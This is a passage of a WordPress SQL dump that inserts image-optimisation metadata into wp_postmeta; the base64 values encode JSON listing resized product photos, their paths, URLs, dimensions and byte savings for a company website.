IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTEtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNzUsInRpbWUiOjE0ODM1NTM2NjEsImlkIjoxODMzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29096, 1832, 'wpfc_optimisation_reduction', '20271'); 
INSERT INTO `wp_postmeta` VALUES (29097, 1832, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MzY2NSwiaWQiOiIxODMyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjczMCwidGltZSI6MTQ4MzU1MzY2OSwiaWQiOjE4MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNTAyLCJ0aW1lIjoxNDgzNTUzNjcyLCJpZCI6MTgzMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIyNDgsInRpbWUiOjE0ODM1NTM2NzYsImlkIjoxODMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDMwNywidGltZSI6MTQ4MzU1MzY4MCwiaWQiOjE4MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0OTgsInRpbWUiOjE0ODM1NTM2ODMsImlkIjoxODMyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQyLCJ0aW1lIjoxNDgzNTUzNjg2LCJpZCI6MTgzMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc1MlUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ3MSwidGltZSI6MTQ4MzU1MzY5MCwiaWQiOjE4MzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NTJVLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMzk4LCJ0aW1lIjoxNDgzNTUzNjkzLCJpZCI6MTgzMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTYyLCJ0aW1lIjoxNDgzNTUzNjk2LCJpZCI6MTgzMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NTJVLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzM4LCJ0aW1lIjoxNDgzNTUzNzAwLCJpZCI6MTgzMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc1MlUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzUyVS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzUyVS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU1MzcwNCwiaWQiOjE4MzJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29098, 1828, 'wpfc_optimisation_reduction', '692'); 
INSERT INTO `wp_postmeta` VALUES (29099, 1828, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdmF6by1mcnMtcHJvZHVjdC1iYW5uZXItZTE0NzQzNzU3NjU1NjcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC92YXpvLWZycy1wcm9kdWN0LWJhbm5lci1lMTQ3NDM3NTc2NTU2Ny5qcGciLCJ3aWR0aCI6MTAwLCJoZWlnaHQiOjc5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdmF6by1mcnMtcHJvZHVjdC1iYW5uZXItZTE0NzQzNzU3NjU1NjcuanBnIiwicmVkdWN0aW9uIjo2OTIsInRpbWUiOjE0ODM1NTM3MTAsImlkIjoiMTgyOCJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29100, 1823, 'wpfc_optimisation_reduction', '27545'); 
INSERT INTO `wp_postmeta` VALUES (29101, 1823, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTM3MTQsImlkIjoiMTgyMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5NTEsInRpbWUiOjE0ODM1NTM3MTcsImlkIjoxODIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzI0NiwidGltZSI6MTQ4MzU1MzcyMCwiaWQiOjE4MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTE0LCJ0aW1lIjoxNDgzNTUzNzI0LCJpZCI6MTgyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM2MjAsInRpbWUiOjE0ODM1NTM3MjgsImlkIjoxODIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjQzLCJ0aW1lIjoxNDgzNTUzNzMxLCJpZCI6MTgyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUzOSwidGltZSI6MTQ4MzU1MzczNCwiaWQiOjE4MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MjQsInRpbWUiOjE0ODM1NTM3MzcsImlkIjoxODIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTk1NiwidGltZSI6MTQ4MzU1Mzc0MSwiaWQiOjE4MjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMSwidGltZSI6MTQ4MzU1Mzc0NCwiaWQiOjE4MjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU1MiwidGltZSI6MTQ4MzU1Mzc0NywiaWQiOjE4MjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY4NiwidGltZSI6MTQ4MzU1Mzc1MSwiaWQiOjE4MjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMTQsInRpbWUiOjE0ODM1NTM3NTQsImlkIjoxODIzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzg5LCJ0aW1lIjoxNDgzNTUzNzU3LCJpZCI6MTgyM31d'); 
INSERT INTO `wp_postmeta` VALUES (29102, 1822, 'wpfc_optimisation_reduction', '21465'); 
